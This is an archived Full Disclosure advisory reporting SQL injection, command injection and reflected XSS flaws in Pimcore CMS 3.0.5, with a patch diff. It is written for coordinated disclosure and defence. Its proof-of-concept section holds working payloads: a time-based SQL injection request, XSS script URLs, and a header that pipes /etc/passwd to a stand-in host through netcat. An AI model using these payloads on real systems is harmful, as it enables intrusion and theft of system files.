[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2015-05-08 13:52:12
Message-ID: 554CBF8C.40403 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
==============Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities
References (Source):
===================http://www.vulnerability-lab.com/get_content.php?id82
Release Date:
============2015-05-08
Vulnerability Laboratory ID (VL-ID):
===================================1482
Common Vulnerability Scoring System:
===================================6.2
Product & Service Introduction:
==============================Pimcore is a powerful and robust Zend Framework based \
PHP content management system (CMS) for creating and managing digital content and \
assets licensed under the open-source BSD license. Create outstanding digital \
experiences on the most flexible content management platform available. Manage and \
edit any type of digital content, for any device and channel in a 100% flexible and \
personalized way. Pimcore features award-winning single-source and multi-channel \
publishing functionality making it easy to manage, update, and integrate content and \
data from various sources. With pimcore brands can create and manage rich digital \
experiences for all of their output channels at once: web, mobile, apps, social \
platforms, print and digital signage. With pimcore you can truly `edit once & reuse \
anywhere`.
(Copy of the Homepage: https://www.pimcore.org/ )
Abstract Advisory Information:
=============================An independent vulnerability laboratory researcher \
discovered multiple vulnerabilities in the official PIM Core v3.0.5 Content \
Management System.
Vulnerability Disclosure Timeline:
=================================2015-05-01: Researcher Notification & Coordination \
(Alain Homewood - PwC New Zealand)
2015-05-01: Vendor Notification (PimCore CMS Security Team)
2015-05-05: Vendor Response/Feedback (PimCore CMS Security Team)
2015-05-07: Vendor Fix/Patch (PimCore Developer Team)
2015-05-08: Public Disclosure (Vulnerability Laboratory - Alain Homewood)
Discovery Status:
================Published
Affected Product(s):
===================Pimcore GmbH
Product: PimCore - Content Management System 3.0.5
Exploitation Technique:
======================Remote
Severity Level:
==============High
Technical Details & Description:
===============================1.1
A (time-based) blind sql injection web vulnerability has been discovered in the \
official Pimcore v3.0.5 Content Management System (web-application). The \
vulnerability allows remote attackers or privileged user accounts to execute own sql \
commands to compromise the affected web-server dbms.
A blind authenticated SQL injection vulnerability exists in the filtering \
functionality of the HTTP error display in the administration panel. Authenticated is \
required to exploit this vulnerability, however low privilege users may have access \
to this functionality (i.e. its located under `Marketing - Search Engine \
Optimisation`). The request method to execute the malicious sql commands is GET and \
the issue is exists in the code line of the web-application.
The security risk of the sql vulnerability is estimated as high with a cvss (common \
vulnerability scoring system) count of 6.2. Exploitation of the remote sql injection \
web vulnerability requires a low privilege application user account without user \
interaction. Successful exploitation of the sql injection vulnerability results in \
application and web-service or dbms compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] ./misc/http-error-log
Vulnerable Parameter(s):
[+] _dc
1.2
A command execution web vulnerability has been discovered in the official Pimcore \
v3.0.5 Content Management System (web-application). The vulnerability allows remote \
attackers or local privilege user accounts to compromise the web-server by execution \
of malicious code.
The newsletter sending functionality uses unsanitized user provided input as part of \
a shell command. Authenticated users can manipulate these values to execute arbitrary \
commands. Note that low privilege users are likely to have access to this \
functionality (e.g. marketing users). Authenticated is required to exploit this \
vulnerability. The request method to execute is POST and the attack vector is located \
on the application-side of the online service.
The security risk of the arbitrary code execution vulnerability is estimated as high \
with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the \
arbitrary code execution vulnerability requires no user interaction but a low \
privilege web-application user account. Successful exploitation of the remote \
vulnerability results in unauthorized execution of system specific codes.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /reports/newsletter/send
Vulnerable Parameter(s):
[+] HOST
1.3
Two reflected cross site scripting web vulnerability has been discovered in the \
official Pimcore v3.0.5 Content Management System (web-application). The \
vulnerability allows remote attackers to inject own script code on the client-side to \
the user (browser) application requests.
Two reflected cross site scripting vulnerabilities exist in the administration panel. \
The issues are located in the `id` value of the echo back through the \
`exportClassAction()` and `exportCustomLayOutDefinitionAction()` functions of the \
`userClassController.php` file. The request method to execute is GET and the issues \
are located on the client-side of the online-service web application.
The security risk of the cross site scripting web vulnerabilities are estimated as \
medium with a cvss (common vulnerability scoring system) count of 3.2. Exploitation \
of the arbitrary code execution vulnerability requires no user interaction or \
privileged web-application user account with password. Successful exploitation of the \
vulnerability results in session hijacking, persistent phishing, persistent external \
redirects and persistent manipulation function or connected module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] exportClassAction()
[+] exportCustomLayOutDefinitionAction()
Vulnerable File(s):
[+] userClassController.php
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
======================1.1
The blind sql injection web vulnerability can be exploited by remote attackers with \
low privilege application user account and low user interaction. For security \
demonstration or to reproduce the vulnerability follow the provided information and \
steps below to continue.
Get requests to /admin/misc/http-error-log fail to sanitise the value of the "limit" \
parameter which allows users to inject SQL statements.
The unsanitized value of the parameter is included in the following SQL query in \
MiscController.php: $logs = $db->fetchAll("SELECT code,uri,`count`,date FROM \
http_error_log " . $condition . " ORDER BY " . $sort . " " . $dir . " LIMIT " . \
$offset . "," . $limit);
PoC or Exploitcode:
This vulnerability can be exploited with a time based technique as described on:
https://rateip.com/blog/sql-injections-in-mysql-limit-clause/
--- PoC Session Logs [GET] ---
GET /admin/misc/http-error-log?_dc30255599566&limit \
%20PROCEDURE%20analyse((select%20extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1)%20LIKE%205,BENCHMARK(5000000,SHA1(1)),1))))),1)&filter= \
HTTP/1.1 Host: [VULNERABLE]
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-pimcore-csrf-token: 44efd8fe89806470db942bbb20ce1e6909eae4bc
X-Requested-With: XMLHttpRequest
Referer: http://[VULNERABLE]/admin/?_dc30255468
Cookie: pimcore_admin_sid=llcv0iq3bthb6alpscnj401dc1
Connection: keep-alive
Reference(s):
admin/misc/http-error-log?_dc
1.2
The code execution web vulnerability can be exploited by remote attackers without \
privilege application user account or user interaction. For security demonstration or \
to reproduce the vulnerability follow the provided information and steps below to \
continue.
The users hostname is retrieved through $_SERVER['HTTP_X_FORWARDED_HOST'] or \
$_SERVER['HTTP_HOST'] and then included in a command that is executed \
(NewsletterController.php).
PoC: The command to be executed can be inserted into an X-forwarded-host HTTP header, \
for example:
--- PoC Session Logs [POST] ---
POST /admin/reports/newsletter/send HTTP/1.1
Host: 1[VULNERABLE]
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-pimcore-csrf-token: 44efd8fe89806470db942bbb20ce1e6909eae4bc
X-Requested-With: XMLHttpRequest
Referer: http://[VULNERABLE]/admin/?_dc30259866451
Content-Length: 20
Cookie: pimcore_admin_sid=llcv0iq3bthb6alpscnj401dc1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
X-forwarded-host: && cat /etc/passwd | nc hacker 1234
Reference(s):
/admin/reports/newsletter/send
1.3
The cross site scripting web vulnerabilities can be exploited by remote attackers \
with low privilege application user account and low user interaction. For security \
demonstration or to reproduce the vulnerability follow the provided information and \
steps below to continue.
Unsanitized user provided input in the "id" parameter is echoed back to the user in \
the exportClassAction() and exportCustomLayOutDefinitionAction() functions in \
userClassController.php.
Only authenticated users with permission to access the class export functionality are \
vulnerable to this (i.e. administrators)
PoC:
http://[VULNERABLE]/admin/class/export-class?id=<script>alert(1)</script>
http://[VULNERABLE]/admin/class/export-custom-layout-definition?id=<script>alert(1)</script>
Solution - Fix & Patch:
======================URL(s): \
https://github.com/pimcore/pimcore/commit/a01a4c87a782a7b20ccc4081c9340698f2d52573
pimcore/modules/admin/controllers/ClassController.php
@@ -484,10 +484,12 @@ public function getAllLayoutsAction() {
public function exportClassAction() {
$this->removeViewRenderer();
- $class = Object ClassDefinition::getById(intval($this->getParam(``id``)));
+
+ $id = intval($this->getParam(``id``));
+ $class = Object ClassDefinition::getById($id);
if (!$class instanceof Object ClassDefinition) {
- $errorMessage = ``: Class with id [ `` . $this->getParam(``id``) . `` \
not found. ]``; + $errorMessage = ``: Class with id [ `` . $id . `` not \
found. ]``; Logger::error($errorMessage);
echo $errorMessage;
} else {
@@ -496,14 +498,13 @@ public function exportClassAction() {
header(``Content-Disposition: attachment; filename= ``class_`` . \
$class->getName() . ``_export.json ````); echo $json;
}
-
}
public function exportCustomLayoutDefinitionAction() {
$this->removeViewRenderer();
- $id = $this->getParam(``id``);
+ $id = intval($this->getParam(``id``));
if ($id) {
$customLayout = Object ClassDefinition CustomLayout::getById($id);
pimcore/modules/reports/controllers/NewsletterController.php
@@ -185,7 +185,7 @@ public function sendAction() {
$letter = Newsletter Config::getByName($this->getParam(``name``));
if($letter) {
- $cmd = Tool Console::getPhpCli() . `` `` . realpath(PIMCORE_PATH . \
DIRECTORY_SEPARATOR . ``cli`` . DIRECTORY_SEPARATOR . ``send-newsletter.php``). `` `` \
. $letter->getName() . `` `` . Tool::getHostUrl(); + $cmd = Tool \
Console::getPhpCli() . `` `` . realpath(PIMCORE_PATH . DIRECTORY_SEPARATOR . ``cli`` \
. DIRECTORY_SEPARATOR . ``send-newsletter.php``). `` `` . \
escapeshellarg($letter->getName()) . `` `` . \
escapeshellarg(Tool::getHostUrl());
Tool Console::execInBackground($cmd, PIMCORE_LOG_DIRECTORY . \
``/newsletter--`` . $letter->getName() . ``.log``); }
pimcore/modules/admin/controllers/MiscController.php
@@ -325,8 +325,8 @@ public function httpErrorLogAction() {
$db = Resource::get();
- $limit = $this->getParam(``limit``);
- $offset = $this->getParam(``start``);
+ $limit = intval($this->getParam(``limit``));
+ $offset = intval($this->getParam(``start``));
$sort = $this->getParam(``sort``);
$dir = $this->getParam(``dir``);
$filter = $this->getParam(``filter``);
Security Risk:
=============1.1
The security risk of the blind sql injection web vulnerability in the pimcore cms is \
estimated as high. (CVSS 6.2)
1.2
The security risk of the code execution web vulnerability in the pimcore cms is \
estimated as high. (CVSS 6.1)
1.3
The security risk of the reflected cross site scripting web vulnerabilities in the \
pimcore cms are estimated as medium. (CVSS 3.2)
Credits & Authors:
=================Alain Homewood - PwC New Zealand \
(http://www.pwc.co.nz/services/assurance-services/pwc-security/)
Disclaimer & Information:
========================The information provided in this advisory is provided as it \
is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \
or implied, including the warranties of merchantability and capability for a \
particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of \
damage, including direct, indirect, incidental, consequential loss of business \
profits or special damages, even if Vulnerability-Lab or its suppliers have been \
advised of the possibility of such damages. Some states do not allow the exclusion or \
limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor \
licenses, policies, deface websites, hack into databases or trade with fraud/stolen \
material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php \
- evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - \
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by Vulnerability-Lab Research Team or \
its suppliers. All pictures, texts, advisories, source code, videos and other \
information on this website is trademark of vulnerability-lab team & the specific \
authors or managers. To record, list (feed), modify, use or edit our material contact \
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic